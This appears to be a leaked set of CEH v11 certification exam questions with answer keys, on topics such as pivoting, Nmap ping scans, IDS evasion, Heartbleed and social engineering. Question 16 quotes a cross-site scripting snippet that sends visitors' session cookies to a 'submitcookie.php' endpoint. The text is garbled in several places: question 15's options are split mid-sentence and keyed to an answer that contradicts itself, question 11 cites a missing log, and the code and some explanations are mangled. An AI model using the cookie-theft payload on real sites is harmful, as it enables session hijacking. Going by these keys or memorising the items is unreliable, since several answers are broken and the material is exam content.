312-50v11 Exam - Certified Ethical Hacker Exam (CEH v11)

NEW QUESTION 1
You have compromised a server and successfully gained a root access. You want to pivot and pass traffic undetected over the network and evade any possible Intrusion Detection System. What is the best approach?

• A. Use Alternate Data Streams to hide the outgoing packets from this server.
• B. Use HTTP so that all traffic can be routed vis a browser, thus evading the internal Intrusion Detection Systems.
• C. Install Cryptcat and encrypt outgoing packets from this server.
• D. Install and use Telnet to encrypt all outgoing traffic from this server.

Answer: C

NEW QUESTION 2
Attacker Rony installed a rogue access point within an organization's perimeter and attempted to intrude into its internal network. Johnson, a security auditor, identified some unusual traffic in the internal network that is aimed at cracking the authentication mechanism. He immediately turned off the targeted network and tested for any weak and outdated security mechanisms that are open to attack. What is the type of vulnerability assessment performed by johnson in the above scenario?

• A. Host-based assessment
• B. Wireless network assessment
• C. Application assessment
• D. Distributed assessment

Answer: B

Explanation:
Wireless network assessment determines the vulnerabilities in an organization’s wireless networks. In the past, wireless networks used weak and defective data encryption mechanisms. Now, wireless network standards have evolved, but many networks still use weak and outdated security mechanisms and are open to attack. Wireless network assessments try to attack wireless authentication mechanisms and gain unauthorized access. This type of assessment tests wireless networks and identifies rogue networks that may exist within an organization’s perimeter. These assessments audit client-specified sites with a wireless network. They sniff wireless network traffic and try to crack encryption keys. Auditors test other network access if they gain access to the wireless network.

NEW QUESTION 3
Clark is a professional hacker. He created and configured multiple domains pointing to the same host to switch quickly between the domains and avoid detection.
Identify the behavior of the adversary In the above scenario.

• A. use of command-line interface
• B. Data staging
• C. Unspecified proxy activities
• D. Use of DNS tunneling

Answer: C

Explanation:
A proxy server acts as a gateway between you and therefore the internet. It’s an intermediary server separating end users from the websites they browse. Proxy servers provide varying levels of functionality, security, and privacy counting on your use case, needs, or company policy.If you’re employing a proxy server, internet traffic flows through the proxy server on its thanks to the address you requested. A proxy server is essentially a computer on the web with its own IP address that your computer knows. once you send an internet request, your request goes to the proxy server first. The proxy server then makes your web request on your behalf, collects the response from the online server, and forwards you the online page data so you’ll see the page in your browser.

NEW QUESTION 4
A security analyst uses Zenmap to perform an ICMP timestamp ping scan to acquire information related to the current time from the target host machine.
Which of the following Zenmap options must the analyst use to perform the ICMP timestamp ping scan?

• A. -PY
• B. -PU
• C. -PP
• D. -Pn

Answer: C

NEW QUESTION 5
Which of the following is an extremely common IDS evasion technique in the web world?

• A. Spyware
• B. Subnetting
• C. Unicode Characters
• D. Port Knocking

Answer: C

NEW QUESTION 6
A user on your Windows 2000 network has discovered that he can use L0phtcrack to sniff the SMB exchanges which carry user logons. The user is plugged into a hub with 23 other systems.
However, he is unable to capture any logons though he knows that other users are logging in. What do you think is the most likely reason behind this?

• A. There is a NIDS present on that segment.
• B. Kerberos is preventing it.
• C. Windows logons cannot be sniffed.
• D. L0phtcrack only sniffs logons to web servers.

Answer: B

NEW QUESTION 7
The Heartbleed bug was discovered in 2014 and is widely referred to under MITRE’s Common Vulnerabilities and Exposures (CVE) as CVE-2014-0160. This bug affects the OpenSSL implementation of the Transport Layer Security (TLS) protocols defined in RFC6520.
What type of key does this bug leave exposed to the Internet making exploitation of any compromised system very easy?

• A. Public
• B. Private
• C. Shared
• D. Root

Answer: B

NEW QUESTION 8
if you send a TCP ACK segment to a known closed port on a firewall but it does not respond with an RST. what do you know about the firewall you are scanning?

• A. There is no firewall in place.
• B. This event does not tell you encrypting about the firewall.
• C. It is a stateful firewall
• D. It Is a non-stateful firewall.

Answer: B

NEW QUESTION 9
Henry Is a cyber security specialist hired by BlackEye - Cyber security solutions. He was tasked with discovering the operating system (OS) of a host. He used the Unkornscan tool to discover the OS of the target system. As a result, he obtained a TTL value, which Indicates that the target system is running a Windows OS. Identify the TTL value Henry obtained, which indicates that the target OS is Windows.

• A. 64
• B. 128
• C. 255
• D. 138

Answer: B

Explanation:
Windows TTL 128, Linux TTL 64, OpenBSD 255 ... https://subinsb.com/default-device-ttl-values/ Time to Live (TTL) represents to number of 'hops' a packet can take before it is considered invalid. For
Windows/Windows Phone, this value is 128. This value is 64 for Linux/Android.

NEW QUESTION 10
in an attempt to increase the security of your network, you Implement a solution that will help keep your wireless network undiscoverable and accessible only to those that know It. How do you accomplish this?

• A. Delete the wireless network
• B. Remove all passwords
• C. Lock all users
• D. Disable SSID broadcasting

Answer: D

NEW QUESTION 11
Based on the following extract from the log of a compromised machine, what is the hacker really trying to steal?

• A. har.txt
• B. SAM file
• C. wwwroot
• D. Repair file

Answer: B

NEW QUESTION 12
You are tasked to perform a penetration test. While you are performing information gathering, you find an employee list in Google. You find the receptionist’s email, and you send her an email changing the source email to her boss’s email (boss@company). In this email, you ask for a pdf with information. She reads your email and sends back a pdf with links. You exchange the pdf links with your malicious links (these links contain malware) and send back the modified pdf, saying that the links don’t work. She reads your email, opens the links, and her machine gets infected. You now have access to the company network. What testing method did you use?

• A. Social engineering
• B. Piggybacking
• C. Tailgating
• D. Eavesdropping

Answer: A

NEW QUESTION 13
Eric, a cloud security engineer, implements a technique for securing the cloud resources used by his organization. This technique assumes by default that a user attempting to access the network is not an authentic entity and verifies every incoming connection before allowing access to the network. Using this technique, he also imposed conditions such that employees can access only the resources required for their role.
What is the technique employed by Eric to secure cloud resources?

• A. Serverless computing
• B. Demilitarized zone
• C. Container technology
• D. Zero trust network

Answer: D

NEW QUESTION 14
You are logged in as a local admin on a Windows 7 system and you need to launch the Computer Management Console from command line.
Which command would you use?

• A. c:\compmgmt.msc
• B. c:\services.msc
• C. c:\ncpa.cp
• D. c:\gpedit

Answer: A

Explanation:
To start the Computer Management Console from command line just type compmgmt.msc
/computer:computername in your run box or at the command line and it should automatically open the Computer Management console.
References:
http://www.waynezim.com/tag/compmgmtmsc/

NEW QUESTION 15
What is the role of test automation in security testing?

• A. It is an option but it tends to be very expensive.
• B. It should be used exclusivel
• C. Manual testing is outdated because of low speed and possible test setup inconsistencies.
• D. Test automation is not usable in security due to the complexity of the tests.
• E. It can accelerate benchmark tests and repeat them with a consistent test setu
• F. But it cannot replace manual testing completely.

Answer: D

NEW QUESTION 16
Judy created a forum, one day. she discovers that a user is posting strange images without writing comments. She immediately calls a security expert, who discovers that the following code is hidden behind those images:
<script>
document.writef<img src="https://Ioca(host/submitcookie.php? cookie ='+ escape(document.cookie)+ " />);
</script>
What issue occurred for the users who clicked on the image?

• A. The code inject a new cookie to the browser.
• B. The code redirects the user to another site.
• C. The code is a virus that is attempting to gather the users username and password.
• D. This php file silently executes the code and grabs the users session cookie and session ID.

Answer: D

Explanation:
document.write(<img.src=https://localhost/submitcookie.php cookie =+ escape(document.cookie) +/>); (Cookie and session ID theft)

NEW QUESTION 17
......